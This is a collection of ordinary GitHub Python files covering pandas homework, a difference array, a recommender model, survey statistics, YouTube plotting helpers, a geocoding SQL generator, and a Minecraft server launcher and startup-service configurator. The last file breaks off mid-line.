+{"seq_id":"23801200794","text":"import pandas as ps\n\"\"\"Readng the given csv and putting NaN values in place of **\"\"\"\ndata=ps.read_csv('6153237444115dat.csv',na_values=['*', '**', '***', '****', '*****', '******'])\n\n\n#PROBLEM FIRST\nprint(\"ANS OF FIRST PROBLEM\")\n\n\"\"\"- How many rows is there in the data?\n- What are the column names?\n- What are the datatypes of the columns?\n- What is the mean Fahrenheit temperature in the data? (`TEMP` column)\n- What is the standard deviation of the Maximum temperature? (`MAX` column)\n- How many unique stations exists in the data? (`USAF` column)\"\"\"\n\n\n\nprint('Total no. 
of row:',data.__len__())\nname=data.columns\nprint('Total columns ')\nfor i in name:\n print(i)\nprint('Datatypes:',data.dtypes)\nprint('mean od temp:',data['TEMP'].mean())\nprint('deviation of MAX:',data['MAX'].std())\nprint('unique',data['USAF'].unique())\n\n#PROBLEM TWO\nprint(\"ANS OF SECOUND\")\n\"\"\" - Select from the `data` columns `USAF, YR--MODAHRMN, TEMP, MAX, MIN` and assign them into a new variable called `selected`\n - Remove all rows from `selected` that has NoData in column `TEMP` using `dropna()` -function\n - Convert the Fahrenheit temperatures from `TEMP` into a new column `Celsius` using the conversion formula\n - Round the values in `Celsius` to have 0 decimals (**don't** create a new column --> update the current one)\n - Convert the `Celsius` values into integers (**don't** create a new column --> update the current one)\"\"\"\n\nselected=ps.concat([data['USAF'],data['YR--MODAHRMN'],data['TEMP'],data['MAX'],data['MIN']],axis=1)\n\nselected=selected.dropna(subset=['TEMP'])\n\nfor i in selected['TEMP']:\n convert(i)\n\n\nselected['Celsius']=a\nb=selected['Celsius'].round()\nselected.update(b)\na.clear()\nfor i in selected['Celsius']:\n a.append(int(i))\nselected['Celsius']=a\n\nprint(selected)\n\n#THIRD\nprint('ans of two')\n\"\"\"- Divide the selection into two separate datasets:\n - Select all rows from `selected` DataFrame into variable called `kumpula` where the `USAF` code is `29980`\n - Select all rows from `selected` DataFrame into variable called `rovaniemi` where the `USAF` code is `28450`\n- Save `kumpula` DataFrame into `Kumpula_temps_May_Aug_2017.csv` file (CSV format) \n - separate the columns with `,`\n - use only 2 decimals in the floating point numbers\n- Save `rovaniemi` DataFrame into `Rovaniemi_temps_May_Aug_2017.csv` file (CSV format) \n - separate the columns with `,`\n - use only 2 decimals in the floating point numbers\"\"\"\n\nkumpula=selected[selected['USAF']==29980]\nrovaniemi=selected[selected['USAF']==28450]\n\nkumpula.to_csv('Kumpula_temps_May_Aug_2017.csv',index=False,float_format='%.2f')\nrovaniemi.to_csv('Rovaniemi_temps_May_Aug_2017.csv',index=False,float_format='%.2f')\n#FORTH\nprint(\"ANS OF FORTH(part 1)\")\n\"\"\"**Part 1**\n\n- What was the median temperature in:\n - Helsinki Kumpula?\n - Rovaniemi?\"\"\"\nprint(kumpula['TEMP'].median())\nprint(rovaniemi['TEMP'].median())\nprint(\"ANS OF FORTH(part 2)\")\n\"\"\"\n- Select from `rovaniemi` and `kumpula` DataFrames such rows from the DataFrames where ``YR--MODAHRMN`` values are from May 2017 (see hints for help)\nand assign them into variables `rovaniemi_may` and `kumpula_may`\n- Do similar procedure for June and assign those values into variables `rovaniemi_june` and `kumpula_june`\n- Using those new subsets print the mean, min and max temperatures for both places in May and June.\"\"\"\nrovaniemi_may=rovaniemi[rovaniemi['YR--MODAHRMN']//1000000==201705]\nkumpula_may=kumpula[kumpula['YR--MODAHRMN']//1000000==201705]\n\nrovaniemi_june=rovaniemi[rovaniemi['YR--MODAHRMN']//1000000==201706]\nkumpula_june=kumpula[kumpula['YR--MODAHRMN']//1000000==201706]\n\nprint(kumpula_june['TEMP'].mean())\nprint(rovaniemi_june['TEMP'].mean())\nprint(kumpula_may['TEMP'].mean())\nprint(rovaniemi_may['TEMP'].mean())\n#FIFTH\nprint(\"ANS OF FIFTH\")\n\"\"\" - create a new DataFrame where you have calculated mean, max and min temperatures for each day separately using the\n hourly values from Rovaniemi and Helsinki Kumpula.\n - this problem is a classical data aggregation 
problem\"\"\"\na.clear()\nb=rovaniemi[['YR--MODAHRMN','TEMP']]\nfor i in b['YR--MODAHRMN']:\n a.append(i//100)\nb['YR--MODAHRMN']=a\nc=b.groupby('YR--MODAHRMN')\na.clear()\nb=[]\nce=[]\nh=[]\nfor x,y in c:\n a.append(y['TEMP'].mean())\n b.append(y['TEMP'].max())\n ce.append(y['TEMP'].min())\n h.append(x)\nd=ps.DataFrame({\n 'hour':h,\n 'mean':a,\n 'max':b,\n 'min':ce\n})\nd\n","repo_name":"lusiferjr/Pandas","sub_path":"project_1/data_exploration.py","file_name":"data_exploration.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"26148430140","text":"class Diff2D:\n def __init__(self, m, n) -> None:\n self.m = m\n self.n = n\n\n self.diff = [[0]*(n+1) for _ in range(m+1)]\n self.result = [[0]*(n+1) for _ in range(m+1)]\n\n def set(self, x0, y0, x1, y1, val):\n \"\"\"\n top-left: (x0, y0)\n bottom-right: (x1, y1)\n \"\"\"\n diff = self.diff\n\n # 排容原理\n diff[x0][y0] += val\n diff[x0][y1+1] -= val\n diff[x1+1][y0] -= val\n diff[x1+1][y1+1] += val\n\n def compute(self):\n diff, result = self.diff, self.result\n\n # c b\n # a current\n result[0][0] = diff[0][0]\n for i in range(self.m):\n for j in range(self.n):\n a = result[i-1][j] if i-1 >= 0 else 0\n b = result[i][j-1] if j-1>= 0 else 0\n c = result[i-1][j-1] if i-1>=0 and j-1>=0 else 0\n result[i][j] = a + b - c + diff[i][j]\n","repo_name":"Vergil0327/leetcode-history","sub_path":"PrefixSum/DiffSum/2D-Difference Array/diff_2d.py","file_name":"diff_2d.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37414717731","text":"\"\"\"183. Customers Who Never Order\"\"\"\n\nimport pandas as pd\n\n\ndef find_customers(customers: pd.DataFrame, orders: pd.DataFrame) -> pd.DataFrame:\n result = customers[~customers.id.isin(orders[\"customerId\"])]\n\n result[\"Customers\"] = result[\"name\"]\n\n return result[[\"Customers\"]]\n","repo_name":"linzeyang/leetcode-solutions","sub_path":"easy/0183.py","file_name":"0183.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5648677389","text":"import numpy as np\nimport torch\nfrom torch import nn\n\n\nclass AutoRec(nn.Module):\n def __init__(self, num_user, latent_dim, dropout):\n super().__init__()\n self.encoder = nn.Linear(num_user, latent_dim)\n self.decoder = nn.Linear(latent_dim, num_user)\n self.dropout = nn.Dropout(dropout)\n self.relu = nn.ReLU()\n self.sig = nn.Sigmoid()\n\n def forward(self, x):\n out = self.encoder(x)\n # out = self.relu(out)\n out = self.sig(out)\n out = self.dropout(out)\n out = self.decoder(out)\n # out = self.relu(out)\n # Mask the gradient of unobserved user-item interaction during training\n if torch.is_grad_enabled():\n out = out * torch.sign(x)\n return out\n\n","repo_name":"gmsft/rec","sub_path":"models/AutoRec.py","file_name":"AutoRec.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70626828808","text":"import pandas as pd \nimport numpy \nimport scipy.stats as stats \nimport seaborn as sns\nimport matplotlib.pyplot as plot\n\nprint ('reading data file...')\ndata = pd.read_csv('nesarc_pds.csv', low_memory=False)\ndata.columns = map(str.upper, data.columns)\n\n# bug fix for display formats to avoid run time errors - put after code for loading data 
above\npd.set_option('display.float_format', lambda x:'%f'%x)\npd.set_option('display.max_rows', None)\n# Current drinkers(CONSUMER - DRINKING STATUS ) Either 1 (yes) or 2(no) to (S7Q31A - EVER DRANK ALCOHOL TO AVOID SOCIAL PHOBIA)\ndrinkerstemp=data[(data['CONSUMER'] ==1) & ((data['S7Q31A']=='1') | (data['S7Q31A']=='2'))]\n\n#Get rid of everything unneeded \ndrinkers = drinkerstemp[['S7Q31A','S2AQ8B','S2AQ8C','S2AQ10','S2BQ1A2','S2BQ1A4','S2BQ1A7', 'S2BQ1A8','S2BQ3B']].copy()\n\ndel drinkerstemp \ndel data\n\nfor col in drinkers: # Convert columns to numeric and replace 99's and nulls\n drinkers[col] = drinkers[col].convert_objects(convert_numeric=True)\n drinkers[col]=drinkers[col].replace(99 ,numpy.nan).fillna(numpy.nan)\n\nfor col in ['S2BQ1A2','S2BQ1A4','S2BQ1A7']: # Set missing values to Nan\n drinkers[col]=drinkers[col].replace(9 ,numpy.nan).fillna(numpy.nan)\n\ndrinkers['S7Q31A'] = drinkers['S7Q31A'].map({1:'SA',2:'NO_SA'}) # Give S7Q31A more intuitive names\n\n#PEARSON\n\ndrinkers_clean = drinkers[['S2BQ3B','S2AQ8B']].dropna()\n\nplt = sns.regplot(drinkers_clean['S2AQ8B'],drinkers_clean['S2BQ3B'])\nplt.set(xlabel='Number of drinks usually consumed', ylabel='Number of episodes of alcohol abuse')\n\nstats.pearsonr(drinkers_clean['S2BQ3B'],drinkers_clean['S2AQ8B'])\n\n#S2AQ10 - HOW OFTEN DRANK ENOUGH TO FEEL INTOXICATED IN LAST 12 MONTHS')\n#S2AQ8B NUMBER OF DRINKS OF ANY ALCOHOL USUALLY CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS\n#S2AQ8C LARGEST NUMBER OF DRINKS OF ANY ALCOHOL CONSUMED ON DAYS WHEN DRANK ALCOHOL IN LAST 12 MONTHS\n\n#S2BQ1A2 - EVER HAD TO DRINK MORE TO GET THE EFFECT WANTED')\n#S2BQ1A4 - EVER INCREASE DRINKING BECAUSE AMOUNT FORMERLY CONSUMED NO LONGER GAVE DESIRED EFFECT')\n#S2BQ1A7 - EVER HAVE PERIOD WHEN ENDED UP DRINKING MORE THAN INTENDED')\n#S2BQ1A8 - EVER HAVE PERIOD WHEN KEPT DRINKING LONGER THAN INTENDED') \n#S2BQ3B - NUMBER OF EPISODES OF ALCOHOL ABUSE)\n","repo_name":"jamesrmccallum/Coursera","sub_path":"Pearson/Corr_Co.py","file_name":"Corr_Co.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18526785989","text":"import pandas as pd\nimport numpy as np\nimport string\nfrom collections import Counter\nfrom PIL import Image\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport sys\nimport dateutil.parser\nimport isodate\nimport scipy.stats as stats\nimport datetime\nfrom matplotlib.gridspec import GridSpec\n\ndef pareto_plot(df, \n x=None, \n y=None, \n title=None, \n number_categories = 10, \n show_pct_y=False, \n pct_format='{0:.0%}'):\n \n '''adapted from mostly from https://tylermarrs.com/posts/pareto-plot-with-matplotlib/ except as indicated'''\n\n import matplotlib.pyplot as plt\n\n dfplot = df[[x,y]]\n\n dfsorted = dfplot.sort_values(y, ascending=False)\n \n df_shortened = dfsorted[0:number_categories] #added for when there are too many categories to plot\n df_remaining = dfsorted[number_categories:df.shape[0]]\n \n xlabel = x\n ylabel = y\n tmp = df_shortened.sort_values(y, ascending=False)\n tmp = tmp.append({x : 'Other' , y : df_remaining[y].abs().sum()}\n , ignore_index=True) #adds in an other category which has the sum of the remainder\n x = tmp[x].values\n y = tmp[y].values\n weights = y / y.sum()\n cumsum = weights.cumsum()\n\n \n fig, ax1 = plt.subplots(figsize = (6,6)) #figsize adjusted to account for rotated labels\n ax1.bar(x, y)\n ax1.set_xlabel(xlabel)\n 
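The red cumulative curve drawn on the twin axis below comes from the weights/cumsum pair computed above. A standalone sketch with assumed counts (not taken from the YouTube data) shows what those two arrays hold:

import numpy as np

counts = np.array([500, 300, 120, 60, 20])   # assumed example values
weights = counts / counts.sum()              # per-bar share: [0.5, 0.3, 0.12, 0.06, 0.02]
cumulative = weights.cumsum()                # running share: [0.5, 0.8, 0.92, 0.98, 1.0]
print(cumulative[-1])                        # reaches 1.0 once every bar is included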
ax1.tick_params(axis = 'x', rotation = 90) #rotation for longer category names\n ax1.set_ylabel(ylabel)\n \n ax2 = ax1.twinx()\n #ax2.ylim(0, 1.0) \n ax2.plot(x, cumsum, '-ro', alpha=0.5)\n ax2.set_ylabel('', color='r')\n ax2.tick_params('y', colors='k', rotation = 'auto')\n ax2.set_ylim([0,1])\n \n \n vals = ax2.get_yticks()\n ax2.set_yticklabels(['{:,.2%}'.format(x) for x in vals])\n\n # hide y-labels on right side\n if not show_pct_y:\n ax2.set_yticks([])\n \n formatted_weights = [pct_format.format(x) for x in cumsum]\n for i, txt in enumerate(formatted_weights):\n ax2.annotate(txt, (x[i], cumsum[i]), fontweight='heavy') \n \n if title:\n plt.title(title)\n \n plt.tight_layout()\n plt.show();\n\ndef sorted_bar_plot(df,x,y):\n\n dfplot = df[[x, y]]\n dfsorted = dfplot.sort_values(y, ascending=False)\n\n #dfplot.head()\n\n xlabel = x\n ylabel = y\n\n x = dfsorted[x].values\n y = dfsorted[y].values\n\n fig, ax = plt.subplots(figsize = (12, 6))\n\n ax.bar(x,y)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.tick_params(axis = 'x', rotation = 90)\n\ndef plot_relationships(df, x, y, title=None, xlim=None, ylim=None):\n '''x vs y scatterplot with an uneccesarily complicated name\n '''\n xlabel = x\n ylabel = y\n \n dfplot = df[[x,y]]\n \n \n x = dfplot[x].values\n y = dfplot[y].values\n \n fig, ax1 = plt.subplots(figsize = (6,6))\n ax1.plot(x, y, 'o')\n ax1.set_xlabel(xlabel)\n ax1.set_ylabel(ylabel)\n ax1.set_title(title)\n ax1.set_xlim(xlim)\n ax1.set_ylim(ylim)\n\ndef label_points(x, y, val, ax='ax'):\n '''labels points on a scatterplot\n '''\n a = pd.concat({'x': x, 'y': y, 'val': val}, axis=1)\n for i, point in a.iterrows():\n ax.text(point['x'], point['y'], str(point['val']))\n\ndef plot_with_line_of_fit(df,x,y,title=None):\n '''produces an x vs y scatter plot with a linear line of best fit\n '''\n xlabel = x\n ylabel = y\n \n dfplot = df[[x,y]]\n \n x = dfplot[x].values\n y = dfplot[y].values\n \n slope, intercept, r_value, p_value, std_err = stats.linregress(\n x,\n y)\n\n line = slope*x+intercept\n\n\n fig, ax1 = plt.subplots(figsize = (6,4))\n ax1.plot(x, y, 'o')\n ax1.set_xlabel(xlabel)\n ax1.set_ylabel(ylabel)\n ax1.set_title(title)\n ax1.plot(x, line)\n\ndef line_of_fit(df, x, y):\n \n dfplot = df[[x,y]]\n \n x = dfplot[x].values\n y = dfplot[y].values\n \n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n \n line = slope*x + intercept\n \n return line\n\ndef word_count(df, col):\n '''while this is used to make a word count, it really just generates three\n lists of words.\n Index 0 = all words in a list of lists\n Index 1 = all words in a singe, flat list\n Index 2 = unique list of words\n '''\n words = []\n for i in df[col]:\n lowercase = str(i).lower()\n separate = lowercase.split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in separate]\n words.append(no_punctuation) \n\n flat_words = []\n for sublist in words:\n for item in sublist:\n flat_words.append(item)\n \n unique_words = np.unique(flat_words)\n \n return words, flat_words, unique_words\n\ndef make_wordcloud(df, col):\n '''adapted from https://www.datacamp.com/community/tutorials/wordcloud-python\n '''\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud = WordCloud(max_font_size=50,\n max_words=100,\n stopwords=stopwords,\n background_color=\"white\").generate(' '.join(word_count(df,col)[1]))\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( 
background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig, ax = plt.subplots(figsize=(10,15))\n \n ax.imshow(wordcloud, interpolation='bilinear')\n ax.imshow(wordcloud, interpolation='bilinear')\n ax.axis(\"off\")\n\nvideo_deets_df = pd.read_csv('../data/video_deets_df.csv')\n\ntitle_dict = {}\nfor i in video_deets_df['channelTitle'].unique():\n value = i.lower().split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in value]\n title_dict[i] = no_punctuation\n\nflat_title_words = []\nfor sublist in list(title_dict.values()):\n for item in sublist:\n flat_title_words.append(item)\nunique_title_words = list(np.unique(flat_title_words))\n\ndef word_count_omit_words(df, col, omit_words = title_dict):\n '''Something in this function doesn't quote work, but the intention was to\n use this, for instance, to make a word cloud of words that are in the video\n title, but NOT in the channel titel.\n '''\n words = []\n for i in df[col]:\n lowercase = str(i).lower()\n separate = lowercase.split()\n no_punctuation = [''.join(c for c in s if c not in string.punctuation) for s in separate]\n for j in no_punctuation:\n if j not in omit_words:\n words.append(no_punctuation) \n\n flat_words = []\n for sublist in words:\n for item in sublist:\n flat_words.append(item)\n \n unique_words = np.unique(flat_words)\n \n return words, flat_words, unique_words\n\ndef make_wordcloud_omit_words(df, col):\n '''Accompanying function to word_count_omit_words\n adapted from https://www.datacamp.com/community/tutorials/wordcloud-python\n '''\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud = WordCloud(max_font_size=50,\n max_words=100,\n stopwords=stopwords,\n background_color=\"white\").generate(' '.join(word_count_omit_words(df,col)[1])\n )\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig, ax = plt.subplots(figsize=(10,15))\n \n ax.imshow(wordcloud, interpolation='bilinear')\n ax.imshow(wordcloud, interpolation='bilinear')\n ax.axis(\"off\")\n\ndef create_sub_df(chan,col):\n video_title_df = video_deets_df[['channelTitle',col,'viewCount']]\n data = video_title_df[video_title_df['channelTitle']==chan]\n data = data[[col,'viewCount']]\n data_dict = {}\n\n for i, row in data.iterrows():\n data_dict[i] = [row['viewCount'],row[col].lower().split()]\n \n return data, data_dict\n\ndef top_videos_per_channel(chan, quant):\n '''Returns the top quant % videos from channel = chan'''\n df = video_deets_df[(video_deets_df.channelTitle == chan) & \n (video_deets_df.viewCount > \n np.quantile(video_deets_df[video_deets_df.channelTitle == chan].viewCount,\n quant))].sort_values(by='viewCount', ascending=False)\n return df\n\ndef wordcloud_all_vs_top_words_per_channel(df, chan, col, quant):\n #### from https://www.datacamp.com/community/tutorials/wordcloud-python\n\n # Create stopword list:\n stopwords = set(STOPWORDS)\n #stopwords.update()\n\n # Generate a word cloud image\n wordcloud1 = WordCloud(max_font_size=50,\n max_words=50,\n stopwords=stopwords,\n background_color=\"white\").generate(\n ' '.join(word_count(video_deets_df[video_deets_df.channelTitle == chan]\n ,col)[1])\n )\n wordcloud2 = WordCloud(max_font_size=50,\n max_words=50,\n stopwords=stopwords,\n background_color=\"white\").generate(\n ' 
'.join(word_count(video_deets_df[(video_deets_df.channelTitle == chan) & \n (video_deets_df.viewCount > \n np.quantile(video_deets_df[video_deets_df.channelTitle == chan].viewCount,\n quant))].sort_values(by='viewCount', ascending=False)\n ,col)[1])\n )\n\n # Create and generate a word cloud image:\n #wordcloud = WordCloud( background_color=\"white\").generate(' '.join(flat_title_words))\n\n # Display the generated image:\n fig = plt.figure(figsize=(12,12))#subplots(1,2, figsize=(12,12))\n fig.suptitle(\"Most Popular Words in {} from {}\".format(col, chan), y=.65, fontsize=18)\n gs = fig.add_gridspec(1, 2)\n \n ax1 = fig.add_subplot(gs[0, 0])\n ax1.imshow(wordcloud1, interpolation='bilinear')\n ax1.axis(\"off\")\n ax1.set_title('All Videos')\n \n ax2 = fig.add_subplot(gs[0, 1])\n ax2.imshow(wordcloud2, interpolation='bilinear')\n ax2.axis(\"off\")\n ax2.set_title('{}% Most Popular Videos'.format(round((1-quant)*100)))\n\ndef channel_hist(chan, mostviews, quant):\n \n data = create_sub_df(chan,'videoTitle')[0].viewCount\n \n fig, ax = plt.subplots()\n\n N, bins, patches = ax.hist(data,\n edgecolor='white', \n linewidth=1, \n bins = 30,\n range = (0,mostviews))\n\n for patch, leftside, rightside in zip(patches, bins[:-1], bins[1:]):\n if rightside > np.percentile(data,quant):\n patch.set_facecolor('r')\n \n ax.set_xlabel('Views')\n ax.tick_params(axis = 'x', rotation = 90)\n ax.set_ylabel('Video Count')\n ax.set_title('Distribution of Views for {}'.format(chan))","repo_name":"scottfeldmanpeabody/MTB-YouTube-EDA","sub_path":"src/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":11308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42195509665","text":"import mysql.connector\nimport ogr\nimport pycountry\nimport dbconfig\n\n# find cities without geo information in db, and add geo info via ESRI\n\n# because getting the data from db takes some time, we cache it in a file\n# called 'cities_nogeo.p'\n\ndb = mysql.connector.connect(user=dbconfig.user, password=dbconfig.password\n\t\t\t\t\t\t\t, host='localhost', database = 'bt')\n\ncursor = db.cursor(buffered = True)\n\nsql = (\"SELECT f_city, f_country FROM ot WHERE f_lon IS NULL AND f_lat IS NULL AND f_city IS NOT NULL AND f_country IS NOT NULL GROUP BY f_lon, f_lat, f_city, f_country;\")\n\ncursor.execute(sql)\nresult = cursor.fetchall()\ndata = [row for row in result]\n\ncursor.close()\ndb.close()\n\t\ndrv = ogr.GetDriverByName('ESRI Shapefile')\nds2_in = drv.Open(\"shapes/gadm28_adm2.shp\")\nlyr2_in = ds2_in.GetLayer(0)\nds3_in = drv.Open(\"shapes/gadm28_adm3.shp\")\nlyr3_in = ds3_in.GetLayer(0)\nds4_in = drv.Open(\"shapes/gadm28_adm4.shp\")\nlyr4_in = ds4_in.GetLayer(0)\n\ndef checkCity(layer, field, data):\n\tfound = []\n\tfailed = []\n\tfor (city, country) in data:\n\t\tc3 = pycountry.countries.get(alpha_2=country).alpha_3\n\t\tf = False\n\t\tfor feature in layer:\n\t\t\tcityname = feature.GetField(field)\n\t\t\tiso = feature.GetField('ISO')\n\t\t\tif (iso == c3 and cityname is not None and cityname.decode('utf-8') == city):\n\t\t\t\tgeo = feature.GetGeometryRef().Centroid()\n\t\t\t\tfound.append((city, country, geo)) \n\t\t\t\tf = True\n\t\tlayer.ResetReading()\n\t\tif not f:\n\t\t\tfailed.append((city, country))\n\n\treturn {'found':found,'notfound':failed}\n\t\n# we test against different types of municipalities and districts\n# orders matters, we want to go from smaller to bigger units\nassigned = []\nresult = checkCity(lyr4_in, 'NAME_4', 
data)\nassigned = assigned + result['found']\nresult = checkCity(lyr3_in, 'NAME_3', result['notfound'])\nassigned = assigned + result['found']\nresult = checkCity(lyr2_in, 'NAME_2', result['notfound'])\nassigned = assigned + result['found']\n\ndoublette = []\nsingle = []\nfor obj in assigned:\n\tfound = False\n\tfor s in single:\n\t\tif obj[0] == s[0]:\n\t\t\tfound = True\n\tif found:\n\t\tdoublette.append(obj)\n\telse:\n\t\tsingle.append(obj)\n\nfor d in doublette:\n\tfor s in single:\n\t\tif d[0] == s[0]:\n\t\t\tsingle.remove(s)\n\t\t\tdoublette.append(s)\n\n\nfh = open('generated/207_addlonlat.sql','wb')\nfor point in single:\n\tsql = (\"UPDATE ot SET f_lat = {}, f_lon = {} \"\n\t\t\t\"WHERE f_country = '{}' AND f_city = '{}';\\n\")\n\tfh.write(sql.format(round(point[2].GetY(),5), round(point[2].GetX(),5), point[1], point[0].encode('utf-8')))\nfh.close()\n\nfh = open('generated/207_addlonlat_manual.sql','wb')\nfor point in doublette:\n\tsql = (\"/* UPDATE ot SET f_lat = {}, f_lon = {} \"\n\t\t\t\"WHERE f_country = '{}' AND f_city = '{}';*/\\n\")\n\tfh.write(sql.format(round(point[2].GetY(),5), round(point[2].GetX(),5), point[1], point[0].encode('utf-8')))\nfh.close()","repo_name":"GolemMediaGmbH/OfficeTemperatureData","sub_path":"02_geochecks/207_checkcity_without_geo.py","file_name":"207_checkcity_without_geo.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"16"} +{"seq_id":"40949149275","text":"import subprocess\nimport linecache\nimport platform\nimport shutil\nimport time\nimport sys\nimport os\n\n\"\"\"自作プログラムの読み込み\"\"\"\nfrom Server import make\nfrom Server import proxy as proxy_program\nfrom Etc import etc\nfrom Etc import check\n\ndef exec_java(dir_name, jar_name, xms, xmx, java_argument=\"\"):\n \"\"\"javaを実行するための関数\"\"\"\n # もし入力内容が0かnotだったら1(1GB)に\n cmd = \"java -Xmx\"+xmx+\"G -Xms\"+xms+\"G -jar ./\"+jar_name+\" \"+java_argument\n subprocess.call(cmd, shell=True, cwd=dir_name+\"/\")\n\ndef select_server():\n \"\"\"サーバーを選択する関数\"\"\"\n minecraft_server_list_txt_lines_count = sum(\n [1 for _ in open('data/minecraft-list.txt', encoding=\"utf-8\")])\n minecraft_server_dir_list_txt_lines_count = sum(\n [1 for _ in open('data/minecraft-dir-list.txt', encoding=\"utf-8\")])\n if not minecraft_server_dir_list_txt_lines_count == minecraft_server_list_txt_lines_count:\n print(\"txtファイルの行数が合わないため、続行できません。\")\n sys.exit(1)\n while True:\n with open(\"data/minecraft-list.txt\", \"r\", encoding=\"utf-8\") as file:\n lines = file.read()\n print(lines)\n choice_lines = input(\"サーバーの番号を入力してください: \")\n if not choice_lines or not choice_lines.isdigit():\n continue\n if int(minecraft_server_dir_list_txt_lines_count) < int(choice_lines):\n continue\n break\n return choice_lines\n\ndef start_server():\n \"\"\"サーバーを実行するための `準備` 関数\"\"\"\n print(\"サーバー起動モード\")\n print(\"起動するサーバーを選んでください\\n\")\n choice_server = select_server()\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n if not os.path.exists(path+\"/\"+start_jar):\n if os.path.exists(path+\"/\"+start_jar.replace(\".jar\", 
\"\")+\"-universal.jar\"):\n start_jar = start_jar.replace(\".jar\", \"\")+\"-universal.jar\"\n else:\n print(\"起動できません。\\nJarファイルが存在しません。\")\n sys.exit(6)\n exec_java(path, start_jar, mem_input[0], mem_input[1], java_argument=\"nogui\")\n\ndef change_port():\n \"\"\"サーバーのポートを再設定する関数\"\"\"\n print(\"サーバーポート変更モード\")\n print(\"ポートを変更する、サーバーを選択してください。\")\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n while True:\n input_port = input(\"再設定するポートを入力してください: \")\n if not input_port or not str.isnumeric(input_port):\n continue\n else:\n break\n make.file_identification_rewriting(path+\"/server.properties\",\n \"server-port=\", \"server-port=\"+input_port+\"\\n\")\n print(\"サーバーのポートを���更しました。\")\n\ndef change_max_player():\n \"\"\"最大参加人数を変更する関数\"\"\"\n print(\"サーバー最大参加人数の変更モード\")\n print(\"最大参加人数を変更したいサーバーを選択してください。\")\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n while True:\n input_max_player = input(\"再設定する最大参加人数を入力してください: \")\n if not input_max_player.isdigit():\n continue\n break\n \n make.file_identification_rewriting(path+\"/server.properties\", \"max-players=\", \"max-players=\"+input_max_player+\"\\n\")\n print(\"サーバーの最大参加人数を変更しました。\")\n\ndef add_startup():\n \"\"\"スタートアップ(LinuxではSystemdなど)にMinecraftを実行するbat-shファイルを登録する関数\"\"\"\n print(\"OS起動時 自動起動 設定モード\")\n check.is_admin()\n print(\"設定したいサーバーを選択してください。\")\n user_use_platfrom = platform.system()\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n absolute_path = os.path.abspath(path)\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n if user_use_platfrom == \"Windows\":\n try:\n file = open(\"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/minecraft\"+path.replace('/', '').replace('minecraft', '')+\".bat\", mode='w')\n file.write(\"java -Xms{xms}G -Xmx{xmx}G -jar {abspath}/{jar_file} nogui \\n\\\n pause\".format(xms = choice_xms, xmx = choice_xmx, abspath = absolute_path, jar_file = start_jar))\n file.close()\n except Exception as excep:\n check.except_print(excep, \"\", True)\n elif user_use_platfrom == \"Linux\":\n if not shutil.which('systemctl'):\n print(\"コマンド:Systemctlが見つかりません\")\n sys.exit(4)\n try:\n file = open(\"/etc/systemd/system/minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\", mode='w')\n file.write(\"[Unit] \\\n \\nDescription=Minecraft Server: %i \\\n \\nAfter=network.target \\\n \\n[Service] \\\n \\nWorkingDirectory={woking_dir} \\\n \\nRestart=always \\\n \\nExecStart=/usr/bin/java -Xms{xms}G -Xmx{xmx}G -jar {jar_file} nogui \\\n \\n[Install] \\\n \\nWantedBy=multi-user.target\".format(woking_dir = absolute_path, xms = choice_xms, xmx = choice_xmx, jar_file = start_jar))\n file.close()\n subprocess.run(\"sudo systemctl daemon-reload\", shell=True)\n 